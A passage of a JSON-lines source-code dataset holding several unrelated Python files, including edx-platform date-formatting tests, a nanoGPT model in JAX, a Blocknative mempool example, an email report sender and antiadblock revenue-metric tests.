_dt):\n return timedelta(hours=-3)\n\n def dst(self, _dt):\n return timedelta(0)\n\n\ndef test_get_default_time_display_no_tzname():\n assert get_default_time_display(None) == \"\"\n test_time = datetime(1992, 3, 12, 15, 3, 30, tzinfo=NamelessTZ())\n assert get_default_time_display(test_time) == \"Mar 12, 1992 at 15:03-0300\"\n\n\ndef test_almost_same_datetime():\n assert almost_same_datetime(\n datetime(2013, 5, 3, 10, 20, 30),\n datetime(2013, 5, 3, 10, 21, 29)\n )\n\n assert almost_same_datetime(\n datetime(2013, 5, 3, 11, 20, 30),\n datetime(2013, 5, 3, 10, 21, 29),\n timedelta(hours=1)\n )\n\n assert not almost_same_datetime(\n datetime(2013, 5, 3, 11, 20, 30),\n datetime(2013, 5, 3, 10, 21, 29)\n )\n\n assert not almost_same_datetime(\n datetime(2013, 5, 3, 11, 20, 30),\n datetime(2013, 5, 3, 10, 21, 29),\n timedelta(minutes=10)\n )\n\n\ndef fake_ugettext(translations):\n \"\"\"\n Create a fake implementation of ugettext, for testing.\n \"\"\"\n def _ugettext(text):\n return translations.get(text, text)\n return _ugettext\n\n\ndef fake_pgettext(translations):\n \"\"\"\n Create a fake implementation of pgettext, for testing.\n \"\"\"\n def _pgettext(context, text):\n return translations.get((context, text), text)\n return _pgettext\n\n\n@ddt.ddt\nclass StrftimeLocalizedTest(unittest.TestCase):\n \"\"\"\n Tests for strftime_localized.\n \"\"\"\n @ddt.data(\n (\"%Y\", \"2013\"),\n (\"%m/%d/%y\", \"02/14/13\"),\n (\"hello\", \"hello\"),\n ('%Y년 %m월 %d일', \"2013년 02월 14일\"),\n (\"%a, %b %d, %Y\", \"Thu, Feb 14, 2013\"),\n (\"%I:%M:%S %p\", \"04:41:17 PM\"),\n (\"%A at %-I%P\", \"Thursday at 4pm\"),\n )\n def test_usual_strftime_behavior(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n assert expected == dtime.strftime(fmt)\n\n @ddt.data(\n (\"SHORT_DATE\", \"Feb 14, 2013\"),\n (\"LONG_DATE\", \"Thursday, February 14, 2013\"),\n (\"TIME\", \"04:41:17 PM\"),\n (\"DAY_AND_TIME\", \"Thursday at 4pm\"),\n (\"%x %X!\", \"Feb 14, 2013 04:41:17 PM!\"),\n )\n def test_shortcuts(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n\n @patch('common.djangoapps.util.date_utils.pgettext', fake_pgettext(translations={\n (\"abbreviated month name\", \"Feb\"): \"XXfebXX\",\n (\"month name\", \"February\"): \"XXfebruaryXX\",\n (\"abbreviated weekday name\", \"Thu\"): \"XXthuXX\",\n (\"weekday name\", \"Thursday\"): \"XXthursdayXX\",\n (\"am/pm indicator\", \"PM\"): \"XXpmXX\",\n }))\n @ddt.data(\n (\"SHORT_DATE\", \"XXfebXX 14, 2013\"),\n (\"LONG_DATE\", \"XXthursdayXX, XXfebruaryXX 14, 2013\"),\n (\"DATE_TIME\", \"XXfebXX 14, 2013 at 16:41\"),\n (\"TIME\", \"04:41:17 XXpmXX\"),\n (\"%x %X!\", \"XXfebXX 14, 2013 04:41:17 XXpmXX!\"),\n )\n def test_translated_words(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n\n @patch('common.djangoapps.util.date_utils.gettext', fake_ugettext(translations={\n \"SHORT_DATE_FORMAT\": \"date(%Y.%m.%d)\",\n \"LONG_DATE_FORMAT\": \"date(%A.%Y.%B.%d)\",\n \"DATE_TIME_FORMAT\": \"date(%Y.%m.%d@%H.%M)\",\n \"TIME_FORMAT\": \"%Hh.%Mm.%Ss\",\n }))\n @ddt.data(\n (\"SHORT_DATE\", \"date(2013.02.14)\"),\n (\"Look: %x\", \"Look: date(2013.02.14)\"),\n (\"LONG_DATE\", \"date(Thursday.2013.February.14)\"),\n (\"DATE_TIME\", \"date(2013.02.14@16.41)\"),\n (\"TIME\", \"16h.41m.17s\"),\n 
(\"The time is: %X\", \"The time is: 16h.41m.17s\"),\n (\"%x %X\", \"date(2013.02.14) 16h.41m.17s\"),\n )\n def test_translated_formats(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n\n @patch('common.djangoapps.util.date_utils.gettext', fake_ugettext(translations={\n \"SHORT_DATE_FORMAT\": \"oops date(%Y.%x.%d)\",\n \"TIME_FORMAT\": \"oops %Hh.%Xm.%Ss\",\n }))\n @ddt.data(\n (\"SHORT_DATE\", \"Feb 14, 2013\"),\n (\"TIME\", \"04:41:17 PM\"),\n )\n def test_recursion_protection(self, fmt_expected):\n (fmt, expected) = fmt_expected\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n assert expected == strftime_localized(dtime, fmt)\n\n @ddt.data(\n \"%\",\n \"Hello%\"\n \"%Y/%m/%d%\",\n )\n def test_invalid_format_strings(self, fmt):\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n with pytest.raises(ValueError):\n strftime_localized(dtime, fmt)\n\n\n@ddt.ddt\nclass StrftimeLocalizedHtmlTest(unittest.TestCase):\n \"\"\"\n Tests for strftime_localized_html.\n \"\"\"\n def setUp(self):\n super().setUp()\n request = RequestFactory().request()\n self.addCleanup(crum.set_current_request, None)\n crum.set_current_request(request)\n\n @ddt.data(\n None,\n 'Africa/Casablanca',\n )\n def test_happy_path(self, timezone):\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n with patch('common.djangoapps.util.date_utils.user_timezone_locale_prefs',\n return_value={'user_timezone': timezone}):\n html = strftime_localized_html(dtime, 'SHORT_DATE')\n assert isinstance(html, Markup)\n self.assertRegex(html,\n 'Feb 14, 2013')\n\n def test_invalid_format_string(self):\n dtime = datetime(2013, 2, 14, 16, 41, 17)\n with self.assertRaisesRegex(AssertionError, 'format \"NOPE\" not yet supported in strftime_localized_html'):\n strftime_localized_html(dtime, 'NOPE')\n","repo_name":"openedx/edx-platform","sub_path":"common/djangoapps/util/tests/test_date_utils.py","file_name":"test_date_utils.py","file_ext":"py","file_size_in_byte":8749,"program_lang":"python","lang":"en","doc_type":"code","stars":6774,"dataset":"github-code","pt":"3"} +{"seq_id":"34099341886","text":"n, c = map(int, input().split())\n\ncells = []\nfor i in range(n):\n cells.append(int(input().strip()))\ncells.sort()\n\nlb = 0\nub = cells[n - 1]\n\n\ndef check_cells(th):\n curr_dis = cells[0]\n cows_cnt = 1\n for i in cells:\n if i - curr_dis >= th:\n curr_dis = i\n cows_cnt += 1\n # print(\"thd\", th, \"cnt\", cows_cnt)\n if cows_cnt >= c:\n return True\n else:\n return False\n\n\nwhile lb < ub - 1:\n mid = (ub + lb) // 2\n # print(\"current range:\", lb, mid, ub)\n if check_cells(mid):\n lb = mid\n else:\n ub = mid\n\nprint(lb)\n","repo_name":"xxu-mzwyt/competitive-programming-solutions","sub_path":"Luogu/P1824.py","file_name":"P1824.py","file_ext":"py","file_size_in_byte":590,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13205130031","text":"from _typeshed import NoneType\n\n\ndef recursive(list1, list2, result):\n a = list1[0]\n b = list2[0]\n \n if len(list1) == 1:\n return [min([a, b]), max([a, b])]\n \n result = [min([a, b]), max([a, b])]\n return result + recursive(list1[1:], list2[1:], result)\n\nlist1 = [1, 2, 4, 7, 9, 10]\nlist2 = [1, 3, 4, 5, 8]\n\nresult = []\nresult = recursive(list1, list2, result)\nresult\n\n### LINKED LIST\n\n# Definition for singly-linked list.\nclass ListNode(object):\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n\nd1 = 
ListNode(val=9)\nc1 = ListNode(val=6, next=d1)\nb1 = ListNode(val=4, next=c1)\na1 = ListNode(val=3, next=b1)\n\nd2 = ListNode(val=8)\nc2 = ListNode(val=7, next=d2)\nb2 = ListNode(val=3, next=c2)\na2 = ListNode(val=2, next=b2)\nclass Solution(object):\n def mergeTwoLists(self, list1, list2):\n \"\"\"\n :type list1: Optional[ListNode]\n :type list2: Optional[ListNode]\n :rtype: Optional[ListNode]\n \"\"\"\n root = self.recursive(list1, list2)\n \n return root\n \n def recursive(self, list1, list2):\n if not list1 or not list2:\n return list1 or list2\n \n if list1.val < list2.val:\n list1.next = self.mergeTwoLists(list1.next, list2)\n return list1\n else:\n list2.next = self.mergeTwoLists(list1, list2.next)\n \n return list2\n \n\nsol = Solution()\nres = sol.mergeTwoLists(a1, a2)","repo_name":"aqqosh/python_tasks","sub_path":"task5.py","file_name":"task5.py","file_ext":"py","file_size_in_byte":1482,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29257758747","text":"import contextlib\nimport json\nimport tarfile\nimport typing as tp\n\nimport pytest\n\nimport yatest.common\n\nfrom maps.garden.sdk.module_traits.module_traits import ModuleTraits, parse_traits\nfrom maps.garden.sdk.module_traits.validation import validate_modules_dependency_graph, \\\n validate_modules_tracked_ancestors, validate_modules_tracked_ancestors_graph, validate_required_fields\n\n\n@pytest.fixture(scope=\"module\")\ndef all_module_traits() -> tp.Dict[str, ModuleTraits]:\n traits_tar = yatest.common.binary_path(\n \"maps/garden/sdk/module_traits/tests/module_traits_bundle/module_traits.tar\")\n with contextlib.closing(tarfile.open(traits_tar, \"r\")) as tar:\n all_traits = {}\n for file_info in tar.getmembers():\n f = tar.extractfile(file_info)\n module_name = file_info.name\n try:\n unparsed_traits = json.load(f)\n all_traits.update(parse_traits([unparsed_traits]))\n except Exception as ex:\n pytest.fail(f\"Failed to parse traits for module {module_name}. Error: {ex}\")\n return all_traits\n\n\ndef test_modules_dependency_graph(all_module_traits):\n validate_modules_dependency_graph(all_module_traits)\n\n\ndef test_modules_tracked_ancestors(all_module_traits):\n validate_modules_tracked_ancestors(all_module_traits)\n\n\ndef test_modules_tracked_ancestors_graph(all_module_traits):\n validate_modules_tracked_ancestors_graph(all_module_traits)\n\n\ndef test_readonly_props(all_module_traits):\n for module_name, traits in all_module_traits.items():\n assert not traits.capabilities, f\"'capabilities' is a read-only field. 
\" \\\n f\"Got {traits.capabilities} in the traits for module '{module_name}'\"\n\n\ndef test_raise_error():\n with pytest.raises(ValueError) as ex:\n validate_required_fields({\n \"test_module\": ModuleTraits.parse_obj({\n \"name\": \"test_module\",\n \"type\": \"source\"\n }),\n \"test_module_2\": ModuleTraits.parse_obj({\n \"name\": \"test_module_2\",\n \"type\": \"source\"\n }),\n })\n\n assert len(ex.value.args[0].split(\"\\n\")) == 2\n assert \"test_module\" in ex.value.args[0] and \"test_module_2\" in ex.value.args[0]\n assert \"sort_options\" in ex.value.args[0]\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"maps/tests/validate_modules_traits.py","file_name":"validate_modules_traits.py","file_ext":"py","file_size_in_byte":2334,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"71501451922","text":"import jax\nimport jax.numpy as jnp\nfrom jax import random\nfrom jax import jit\nfrom typing import List, Tuple\nimport optax\nimport equinox as eqx\nfrom equinox import static_field\n\n\nclass Head(eqx.Module):\n query: jnp.ndarray\n key: jnp.ndarray\n value: jnp.ndarray\n tril: jnp.ndarray = static_field()\n dropout_rate: float = static_field()\n head_size: float = static_field()\n\n def __init__(self, jax_key, head_size, n_emb, block_size, dropout_rate):\n keys = random.split(jax_key, 3)\n self.query = random.uniform(keys[0], (n_emb, head_size)) * (1 / n_emb**0.5)\n self.key = random.uniform(keys[1], (n_emb, head_size)) * (1 / n_emb**0.5)\n self.value = random.uniform(keys[2], (n_emb, head_size)) * (1 / n_emb**0.5)\n self.tril = jnp.tril(jnp.ones((block_size, block_size)))\n self.dropout_rate = dropout_rate\n self.head_size = head_size\n\n def __call__(self, x, key, is_training):\n B, T, C = x.shape\n\n k = x @ self.key # B, T, H\n q = x @ self.query # B, T, H\n wei = q @ k.transpose(0, 2, 1) * (self.head_size**-0.5) # B, T, T\n wei = jnp.where(self.tril[:T, :T] == 0, -jax.numpy.inf, wei) # B, T, T\n wei = jax.nn.softmax(wei, axis=-1) # B, T, T\n if is_training:\n wei *= random.bernoulli(key, 1 - self.dropout_rate, wei.shape) # dropout\n wei /= 1 - self.dropout_rate\n # perform the weighted aggregation of the values\n v = x @ self.value # B, T, H\n out = wei @ v # B, T, H\n return out\n\n\nclass MultiHeadAttention(eqx.Module):\n heads: List[eqx.Module]\n proj: jnp.ndarray\n dropout_rate: float = static_field()\n\n def __init__(self, jax_key, head_size, n_emb, block_size, num_heads, dropout_rate):\n keys = random.split(jax_key, 1 + num_heads)\n self.heads = [\n Head(keys[index], head_size, n_emb, block_size, dropout_rate)\n for index in range(num_heads)\n ]\n self.proj = random.uniform(keys[-1], (n_emb, n_emb)) * (1 / n_emb**0.5)\n self.dropout_rate = dropout_rate\n\n def __call__(self, x, key, is_training):\n keys = random.split(key, 1 + len(self.heads))\n out = jnp.concatenate(\n [h(x, k, is_training) for h, k in zip(self.heads, keys)], axis=-1\n ) # B, T, E\n out = out @ self.proj # B, T, E\n if is_training:\n out *= random.bernoulli(\n keys[-1], 1 - self.dropout_rate, out.shape\n ) # dropout\n out /= 1 - self.dropout_rate\n return out\n\n\nclass FeedForward(eqx.Module):\n l1: jnp.ndarray\n l2: jnp.ndarray\n dropout_rate: float = static_field()\n\n def __init__(self, jax_key, n_emb, dropout_rate):\n keys = random.split(jax_key, 2)\n self.l1 = random.uniform(keys[0], (n_emb, 4 * n_emb)) * (1 / n_emb**0.5)\n self.l2 = random.uniform(keys[1], (4 * n_emb, n_emb)) * (1 / (4 * n_emb) ** 0.5)\n self.dropout_rate = 
dropout_rate\n\n def __call__(self, x, key, is_training):\n x = x @ self.l1\n x = jax.nn.relu(x)\n x = x @ self.l2\n if is_training:\n x *= random.bernoulli(key, 1 - self.dropout_rate, x.shape) # dropout\n x /= 1 - self.dropout_rate\n\n return x\n\n\nclass Block(eqx.Module):\n sa: eqx.Module\n ffwd: eqx.Module\n ln1: eqx.Module\n ln2: eqx.Module\n\n \"\"\" Transformer block: communiction followed by computation \"\"\"\n\n def __init__(self, jax_key, n_embd, block_size, n_head, dropout_rate):\n # n_embd: embedding dimension, n_head: the number of heads we would like\n keys = random.split(jax_key, 2)\n head_size = n_embd // n_head\n self.sa = MultiHeadAttention(\n keys[0], head_size, n_embd, block_size, n_head, dropout_rate\n )\n self.ffwd = FeedForward(keys[1], n_embd, dropout_rate)\n self.ln1 = LayerNorm(n_embd)\n self.ln2 = LayerNorm(n_embd)\n\n def __call__(self, x, key, is_training):\n key1, key2 = random.split(key, 2)\n x = x + self.sa(self.ln1(x), key1, is_training)\n x = x + self.ffwd(self.ln2(x), key2, is_training)\n return x\n\n\nclass LayerNorm(eqx.Module):\n gamma: jnp.ndarray\n beta: jnp.ndarray\n eps: float = static_field()\n\n def __init__(self, dim, eps=1e-5):\n self.gamma = jnp.ones(dim)\n self.beta = jnp.zeros(dim)\n self.eps = eps\n\n def __call__(self, x):\n xmean = jnp.mean(x, axis=-1, keepdims=True)\n xvar = jnp.var(x, axis=-1, keepdims=True)\n inv = self.gamma * jax.lax.rsqrt(xvar + self.eps)\n return inv * (x - xmean) + self.beta\n\n\nclass NanoGPT(eqx.Module):\n tok_embedding: jnp.ndarray\n pos_embedding: jnp.ndarray\n lm_head: jnp.ndarray\n blocks: List[eqx.Module]\n ln_f: eqx.Module\n\n def __init__(\n self, jax_key, vocab_size, n_emb, block_size, n_head, n_layer, dropout_rate\n ):\n keys = random.split(jax_key, 3 + n_layer)\n self.tok_embedding = random.uniform(keys[0], (vocab_size, n_emb)) * (\n 1 / vocab_size**0.5\n )\n self.pos_embedding = random.uniform(keys[1], (block_size, n_emb)) * (\n 1 / block_size**0.5\n )\n self.lm_head = random.uniform(keys[2], (n_emb, vocab_size)) * (1 / n_emb**0.5)\n self.blocks = [\n Block(\n jax_key=keys[-index],\n n_embd=n_emb,\n n_head=n_head,\n block_size=block_size,\n dropout_rate=dropout_rate,\n )\n for index in range(n_layer)\n ]\n self.ln_f = LayerNorm(n_emb)\n\n def __call__(self, idx, key, is_training):\n B, T = idx.shape\n # idx and targets are both (B,T) tensor of integers\n\n tok_emb = self.tok_embedding[idx] # (B, T, C)\n pos_emb = self.pos_embedding[jnp.arange(T)] # (T, C)\n x = pos_emb + tok_emb # (B, T, C)\n\n keys = random.split(key, len(self.blocks))\n for block, k in zip(self.blocks, keys):\n x = block(x, k, is_training)\n x = self.ln_f(x)\n logits = x @ self.lm_head\n\n return logits\n","repo_name":"mahakal001/nanogpt-jax","sub_path":"nanogpt_jax/nanogpt_jax.py","file_name":"nanogpt_jax.py","file_ext":"py","file_size_in_byte":6130,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"29050346382","text":"from blocknative.stream import Stream as BNStream\nimport json,sys,traceback,logging\n\nmonitor_address = '0x7a250d5630b4cf539739df2c5dacb4c659f2488d'\n\nasync def txn_handler(txn, unsubscribe):\n print(json.dumps(txn, indent=4))\n\nif __name__ == '__main__':\n try:\n if len(sys.argv) == 1:\n print('%s apikey' % sys.argv[0])\n else:\n logging.basicConfig(level=logging.INFO) \n apikeyfile = sys.argv[1]\n with open(apikeyfile, 'r') as apikey:\n keystring = apikey.readline().rstrip().lstrip()\n stream = BNStream(keystring)\n filter = {'network': 'main'}\n 
stream.subscribe_address(monitor_address, txn_handler, filters=[filter])\n stream.connect()\n except Exception as e:\n logging.error('API Failed: %s', str(e))\n traceback.print_exc(e)\n","repo_name":"blocknative/python-sdk","sub_path":"examples/subscribe.py","file_name":"subscribe.py","file_ext":"py","file_size_in_byte":887,"program_lang":"python","lang":"en","doc_type":"code","stars":44,"dataset":"github-code","pt":"3"} +{"seq_id":"71556212562","text":"import smtplib\nimport os, zipfile, time\nimport sys\n\"\"\"发送纯文本信息\"\"\"\nfrom email.mime.text import MIMEText\n\"\"\"混合信息\"\"\"\nfrom email.mime.multipart import MIMEMultipart\n\"\"\"导入配置库\"\"\"\nfrom lang.common.ini_read import *\n\nbasedir = os.path.dirname(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nsys.path.append(basedir)\n\n\n# def zip_report(input_path, output_path, output_name):\n# \"\"\"将测试报告生成压缩文件\"\"\"\n# f = zipfile.ZipFile(output_path+'/' + output_name, 'w', zipfile.ZIP_DEFLATED)\n# files = os.listdir(input_path)\n# for file in files:\n# if os.path.splitext(file)[1] == \".html\":\n# f.write(input_path + '/' + file)\n# f.close()\n# return output_path+r\"/\"+output_name\n\n\ndef send_mail_report(title):\n \"\"\"将测试报告发送到邮件\"\"\"\n\n \"\"\"获取测试报告邮件服务器、发件人、收件人等信息\"\"\"\n \"\"\"发件人\"\"\"\n sender = ini_options('mail', 'sender', 'config')\n \"\"\"收件人\"\"\"\n receiver = ini_options('mail', 'receiver', 'config')\n \"\"\"smtp服务器\"\"\"\n smtp_server = ini_options('mail', 'smtp_server', 'config')\n \"\"\"smtp服务端口\"\"\"\n mail_port = ini_options('mail', 'mail_port', 'config')\n \"\"\"账户\"\"\"\n username = ini_options('mail', 'username', 'config')\n \"\"\"密码\"\"\"\n password = ini_options('mail', 'password', 'config')\n\n msg_root = MIMEMultipart(\"related\")\n msg_root[\"subject\"] = title\n msg_root[\"from\"] = sender\n msg_root[\"to\"] = receiver\n body = \"hi, All! 
附件为交易网关业务功能【QA环境】版本接口测试报告,请注意查看!\"\n msg_html = MIMEText(body, 'html', 'utf-8')\n msg_root.attach(msg_html)\n\n \"\"\"获取最新测试报告\"\"\"\n report_path = basedir+\"/lang/report/\"\n new_report = \"\"\n for root, subdirs, files in os.walk(report_path):\n for file in files:\n \"\"\"判断该目录下的文件扩展名是否为html\"\"\"\n if os.path.splitext(file)[1] == \".html\":\n new_report = file\n\n # \"\"\"改变当前的相对路径由 testSuite变更为report,然后压缩report下面的测试报告Report.html文件\"\"\"\n # os.chdir(report_path)\n # cwd = os.getcwd()\n # print(\"cwd is:\"+cwd)\n # \"\"\"将Report.html文件压缩成.zip文件,存放路径为./report\"\"\"\n # zip_report(r\"./\", './', 'payCenter_API_Test_Report.zip')\n\n \"\"\"生成邮件的内容\"\"\"\n msg = MIMEMultipart()\n msg[\"subject\"] = title\n msg['date'] = time.strftime('%a, %d %b %Y %H:%M:%S %z')\n with open(os.path.join(report_path, new_report), 'rb') as f:\n mailbody = f.read()\n html = MIMEText(mailbody, _subtype='html', _charset='utf-8')\n msg.attach(html)\n\n \"\"\"将测试报告压缩文件添加到邮件附件\"\"\"\n # att = MIMEText(open('./payCenter_API_Test_Report.zip', 'rb').read(), 'base64', 'utf-8')\n att = MIMEText(open(os.path.join(report_path, new_report), 'rb').read(), 'base64', 'utf-8')\n att[\"Content-Type\"] = 'application/octet-stream'\n att.add_header(\"Content-Disposition\", \"attachment\", filename=\"Report.html\")\n msg.attach(att)\n\n \"\"\"发送邮件\"\"\"\n msg['from'] = sender\n try:\n smtp = smtplib.SMTP_SSL(smtp_server, 465)\n # smtp = smtplib.SMTP()\n # smtp.connect(smtp_server, mail_port)\n smtp.login(username, password)\n smtp.sendmail(sender, receiver.split(','), msg.as_string())\n smtp.close()\n print(\"邮件发送成功\")\n except Exception:\n print(\"Error :无法发送邮件\")\n raise\n\n\nif __name__ == '__main__':\n send_mail_report(\"【lang-QA环境】APP——UI自动化冒烟测试\")\n","repo_name":"xieguoyong/Lang-UI-Tests","sub_path":"lang/tools/send_email.py","file_name":"send_email.py","file_ext":"py","file_size_in_byte":3655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29039675067","text":"import pytest\nimport pandas as pd\n\nfrom antiadblock.tasks.tools.yt_utils import get_available_yt_cluster\nimport antiadblock.tasks.tools.common_configs as configs\nfrom antiadblock.tasks.money_by_service_id.lib.lib import Columns, DIMENSIONS, AGGREGATION_FIELDS, PREFIXES, METRICS, get_dataframe, consume_dataframe, get_sensors\n\n\nBSDSP_YQL = pd.DataFrame(\n data=[\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 0] + [1] * 3,\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 0] + [1] * 3,\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 1] + [1] * 3,\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 1] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 0] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 0] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 1] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 1] + [1] * 3,\n ],\n columns=DIMENSIONS + AGGREGATION_FIELDS + PREFIXES + METRICS,\n)\nBSCHEVENT_ONLY_BLOCKS_YQL = pd.DataFrame(\n data=[\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 0] + [2] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1, 0] + [2] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0, 1] + [2] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + 
['direct', 'desktop', 'auto.ru'] + [1, 1] + [2] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [0, 0] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [1, 0] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [0, 1] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [1, 1] + [1] * 3,\n ],\n columns=DIMENSIONS + AGGREGATION_FIELDS + PREFIXES + METRICS,\n)\nEVENTBAD_YQL = pd.DataFrame(\n data=[\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0] + [1] * 3,\n ['2019-12-10 00:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [0] + [1] * 3,\n ['2019-12-10 01:00:00', 'autoru'] + ['direct', 'desktop', 'auto.ru'] + [1] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [0] + [1] * 3,\n ['2019-12-10 01:00:00', 'docviewer'] + ['direct', 'desktop', 'docviewer.yandex.ru'] + [1] + [1] * 3,\n ],\n columns=DIMENSIONS + AGGREGATION_FIELDS + [Columns.aab.name] + METRICS,\n)\nEXPECTED_JOINED = pd.DataFrame(\n data=[\n [pd.Timestamp('2019-12-10 00:00:00'), 'autoru', 'direct', 'desktop', 'auto.ru', 2, 1, 4, 4, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n [pd.Timestamp('2019-12-10 01:00:00'), 'autoru', 'direct', 'desktop', 'auto.ru', 4, 2, 8, 8, 4, 4, 4, 4, 4, 2, 2, 2, 1, 1, 1, 1, 1, 1],\n [pd.Timestamp('2019-12-10 01:00:00'), 'docviewer', 'direct', 'desktop', 'docviewer.yandex.ru', 2, 1, 4, 4, 2, 2, 2, 2, 2, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n ],\n columns=DIMENSIONS + AGGREGATION_FIELDS + ['money', 'aab_money', 'shows', 'clicks', 'aab_shows', 'aab_clicks', 'fraud_money', 'fraud_shows',\n 'fraud_clicks', 'aab_fraud_money', 'aab_fraud_shows', 'aab_fraud_clicks', 'bad_money',\n 'aab_bad_money', 'bad_shows', 'aab_bad_shows', 'bad_clicks', 'aab_bad_clicks']\n).set_index(DIMENSIONS + AGGREGATION_FIELDS)\n\n\ndef test_get_dataframe():\n dataframe = get_dataframe(BSDSP_YQL, BSCHEVENT_ONLY_BLOCKS_YQL, EVENTBAD_YQL)\n assert dataframe.equals(EXPECTED_JOINED)\n\n joined_spoiled = EXPECTED_JOINED.copy()\n joined_spoiled.iloc[0]['money'] = 0\n assert not dataframe.equals(joined_spoiled)\n\n\n@pytest.mark.parametrize('scale', configs.Scales)\ndef test_consume_dataframe_stat(scale):\n dataframe = EXPECTED_JOINED.xs(pd.Timestamp('2019-12-10 00:00:00'), level=Columns.date.name, drop_level=False) # left only one row\n expeted_stat_row = {\n 'service_id': '---placeholder---',\n 'fielddate': '2019-12-10 00:00:00',\n 'money': 2,\n 'aab_money': 1,\n 'shows': 4,\n 'clicks': 4,\n 'aab_shows': 2,\n 'aab_clicks': 2,\n 'fraud_money': 2,\n 'fraud_shows': 2,\n 'fraud_clicks': 2,\n 'aab_fraud_money': 1,\n 'aab_fraud_shows': 1,\n 'aab_fraud_clicks': 1,\n 'bad_money': 1,\n 'aab_bad_money': 1,\n 'bad_shows': 1,\n 'aab_bad_shows': 1,\n 'bad_clicks': 1,\n 'aab_bad_clicks': 1\n }\n expected_stat_data = []\n for tree in [['TOTAL'],\n ['TOTAL', 'producttype', 'direct'],\n ['TOTAL', 'device', 'desktop'],\n ['TOTAL', 'domain', 'auto.ru'],\n ['TOTAL', 'producttype', 'direct', 'device', 'desktop'],\n ['autoru'],\n ['autoru', 'producttype', 'direct'],\n ['autoru', 'device', 'desktop'],\n ['autoru', 'domain', 'auto.ru'],\n ['autoru', 'producttype', 'direct', 'device', 'desktop']]:\n expected_stat_data.append(expeted_stat_row.copy())\n expected_stat_data[-1]['service_id'] = tree\n\n stat, _ = 
consume_dataframe(dataframe, scale=scale)\n assert stat == expected_stat_data\n\n\n@pytest.mark.parametrize('scale', configs.Scales)\ndef test_consume_dataframe_solomon(scale):\n dataframe = EXPECTED_JOINED.xs(pd.Timestamp('2019-12-10 00:00:00'), level=Columns.date.name, drop_level=False) # left only one row\n expeted_sensors = [\n {'ts': 1575925200.0, 'value': 50.0, 'labels': {'sensor': 'ratio name', 'service_id': 'autoru', 'producttype': '_all', 'device': '_all'}},\n {'ts': 1575925200.0, 'value': 50.0, 'labels': {'sensor': 'ratio name', 'service_id': 'autoru', 'device': '_all', 'producttype': 'direct'}},\n {'ts': 1575925200.0, 'value': 50.0, 'labels': {'sensor': 'ratio name', 'service_id': 'autoru', 'producttype': '_all', 'device': 'desktop'}},\n ]\n _, solomon = consume_dataframe(dataframe, scale=scale, calculate_ratios=[('ratio name', ('aab_money', 'money'))])\n assert solomon == expeted_sensors\n\n\n@pytest.mark.parametrize('ratio, value', [\n [[('name', ('aab_money', 'money'))], 50.],\n [[('name', ('money', 'money'))], 100.],\n [[('name', ('money', 'bad_money'))], 200.],\n])\ndef test_get_sensors(ratio, value):\n dataframe = EXPECTED_JOINED.xs(pd.Timestamp('2019-12-10 00:00:00'), level=Columns.date.name, drop_level=False) # left only one row\n solomon = get_sensors(dataframe, ratios=ratio)\n assert solomon == [{'ts': 1575925200.0, 'value': value, 'labels': {'sensor': 'name', 'service_id': 